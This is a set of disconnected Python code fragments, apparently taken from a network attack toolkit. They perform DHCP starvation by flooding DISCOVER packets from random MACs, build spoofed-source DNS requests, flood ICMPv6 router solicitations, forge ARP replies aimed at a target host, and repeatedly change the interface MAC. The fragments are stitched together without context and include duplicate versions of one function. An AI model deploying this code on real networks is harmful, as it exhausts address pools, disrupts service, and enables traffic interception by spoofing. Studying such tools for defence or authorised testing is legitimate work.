def send_dhcp_discover(): sleep(1) eth = Ethernet_raw() dhcp = DHCP_raw() Base.print_info("Sending discover packets...") Base.print_info("Delay between DISCOVER packets: ", str(args.delay), " sec.") Base.print_info("Start sending packets: ", str(datetime.now().strftime("%Y/%m/%d %H:%M:%S"))) discover_raw_socket = socket(AF_PACKET, SOCK_RAW) discover_raw_socket.bind((listen_network_interface, 0)) try: while True: client_mac = eth.get_random_mac() transaction_id = randint(1, 4294967295) discover_packet = dhcp.make_request_packet( source_mac=your_mac_address, client_mac=client_mac, transaction_id=transaction_id, dhcp_message_type=1, host_name=None, requested_ip=None, option_value=dhcp_option_value, option_code=dhcp_option_code, relay_agent_ip=your_ip_address) discover_raw_socket.send(discover_packet) transactions[transaction_id] = client_mac if int(time() - start_time) > args.timeout: if ack_received: Base.print_success( "IP address pool is exhausted: ", str(datetime.now().strftime("%Y/%m/%d %H:%M:%S"))) else: Base.print_error("DHCP Starvation failed timeout!") sleep(1) exit(1) sleep(int(args.delay)) except KeyboardInterrupt: Base.print_info("Exit") discover_raw_socket.close() exit(0)
def send_dhcp_discover(): sleep(1) eth = Ethernet_raw() dhcp = DHCP_raw() print Base.c_info + "Sending discover packets..." print Base.c_info + "Delay between DISCOVER packets: " + Base.cINFO + str( args.delay) + " sec." + Base.cEND print Base.c_info + "Start sending packets: " + Base.cINFO + str(datetime.now().strftime("%Y/%m/%d %H:%M:%S")) + \ Base.cEND while True: client_mac = eth.get_random_mac() transaction_id = randint(1, 4294967295) discover_packet = dhcp.make_request_packet( source_mac=_current_mac_address, client_mac=client_mac, transaction_id=transaction_id, dhcp_message_type=1, host_name=None, requested_ip=None, option_value=_dhcp_option_value, option_code=_dhcp_option_code, relay_agent_ip=_current_ip_address) sendp(discover_packet, iface=_current_network_interface, verbose=False) _transactions[transaction_id] = client_mac if int(time() - _start_time) > args.timeout: if _ack_received: print Base.c_success + "IP address pool is exhausted: " + Base.cSUCCESS + \ str(datetime.now().strftime("%Y/%m/%d %H:%M:%S")) + Base.cEND else: print Base.c_error + "DHCP Starvation failed!" system('kill -9 ' + str(getpid())) sleep(int(args.delay))
print "Creating packets..." if args.notspoofmac: print " Your MAC address is not spoofed!" eth = Ethernet_raw() dhcp = DHCP_raw() while count < count_max: if args.notspoofmac: SRC_MAC = current_mac_address else: SRC_MAC = eth.get_mac_for_dhcp_discover() CLIENT_MAC = eth.get_random_mac() HOST_NAME = Base.make_random_string(8) current_packet = dhcp.make_discover_packet(SRC_MAC, CLIENT_MAC, HOST_NAME) PACKETS.append(current_packet) count += 1 if count > count_percent: stdout.flush() stdout.write(" Complete: " + str(index_percent + 1) + "% \r") index_percent += 1 count_percent = (count_max / 100) * index_percent NUMBER_OF_PACKETS = int(args.packets) NUMBER_OF_ITERATIONS = int(args.iterations)
while count < count_max: for NS in NS_list.keys(): DST_MAC = NS_list[NS]["MAC"] DST_IP = NS_list[NS]["IP"] DST_PORT = NS_list[NS]["PORT"] SRC_MAC = None SRC_IP = None SRC_PORT = randint(2049, 65535) if args.notspoofmac: SRC_MAC = your_mac_address else: SRC_MAC = eth.get_random_mac() if args.notspoofip: SRC_IP = your_ip_address else: if len(spoofed_hosts) > 1: SRC_IP = str(choice(spoofed_hosts)) elif len(spoofed_hosts) == 1: SRC_IP = str(spoofed_hosts[0]) else: print "Bad spoofed network!" exit(1) TID = randint(1, 65535) if args.pathtodomainlist is not None:
from base import Base from network import Ethernet_raw, IP_raw, UDP_raw, DHCP_raw Base.check_platform() Base.check_user() Base.netiface_selection() eth = Ethernet_raw() ip = IP_raw() udp = UDP_raw() dhcp = DHCP_raw() print eth.get_random_mac() print ":".join("{:02x}".format(ord(c)) for c in eth.make_header("aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb", 2048)) print ip.get_random_ip() print ":".join("{:02x}".format(ord(c)) for c in ip.make_header("127.0.0.1", "127.0.0.1", 0, 8, 1)) print ":".join("{:02x}".format(ord(c)) for c in udp.make_header(12345, 53, 0)) print ":".join("{:02x}".format(ord(c)) for c in dhcp.make_discover_packet("aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb", "10.10.10.10", "test"))
if args.src_ipv6 is None: src_ipv6_address = Base.get_netiface_ipv6_link_address(current_network_interface) else: src_ipv6_address = args.src_ipv6 print Base.c_info + "Interface: " + current_network_interface print Base.c_info + "Src IPv6 address: " + src_ipv6_address print Base.c_info + "Src MAC address: " + src_mac_address print Base.c_info + "Sending ICMPv6 router solicit packets ..." SOCK = socket(AF_PACKET, SOCK_RAW) SOCK.bind((current_network_interface, 0)) try: for _ in range(args.number_of_packets): rs_packet = icmpv6.make_router_solicit_packet(src_mac_address, src_ipv6_address, True, eth.get_random_mac()) rs_packets.append(rs_packet) for iteration in range(args.number_of_iterations): print Base.c_info + "Iteration: " + str(iteration) index = 0 while index < args.number_of_packets: SOCK.send(rs_packets[index]) index += 1 except: print Base.c_error + "Do not send ICMPv6 router solicit packets!" SOCK.close() exit(1) print Base.c_success + "Send all ICMPv6 router solicit packets!" SOCK.close()
args = parser.parse_args() current_network_interface = None sender_mac_address = None sender_ip_address = None eth = Ethernet_raw() if args.interface is None: current_network_interface = Base.netiface_selection() else: current_network_interface = args.interface if args.sender_mac is None: sender_mac_address = eth.get_random_mac() else: sender_mac_address = args.sender_mac print "\r\nNetwork interface: " + current_network_interface print "Target mac address: " + args.target_mac print "Target IP address: " + args.target_ip print "Sender mac address: " + sender_mac_address print "Sender ip address: " + args.sender_ip + "\r\n" def make_arp_reply_packet(): return (Ether(src=sender_mac_address, dst=args.target_mac) / ARP(hwsrc=sender_mac_address, psrc=args.sender_ip, hwdst=args.target_mac, pdst=args.target_ip))
# region Get old ip and mac addresses old_mac_address = Base.get_netiface_mac_address( listen_network_interface) old_ip_address = Base.get_netiface_ip_address( listen_network_interface) # endregion # region Stop network Base.print_info("Stop network ...") system('service network-manager stop') system('service networking stop 2>/dev/null') system('service network stop 2>/dev/null') # endregion while True: new_mac_address = eth.get_random_mac() # region Change MAC Base.print_info("New MAC address: ", new_mac_address) system('ifconfig ' + listen_network_interface + ' down') system('ifconfig ' + listen_network_interface + ' hw ether ' + new_mac_address) system('ifconfig ' + listen_network_interface + ' up') # endregion # region Start network system('service network-manager start') system('service networking start 2>/dev/null') system('service network start 2>/dev/null') # endregion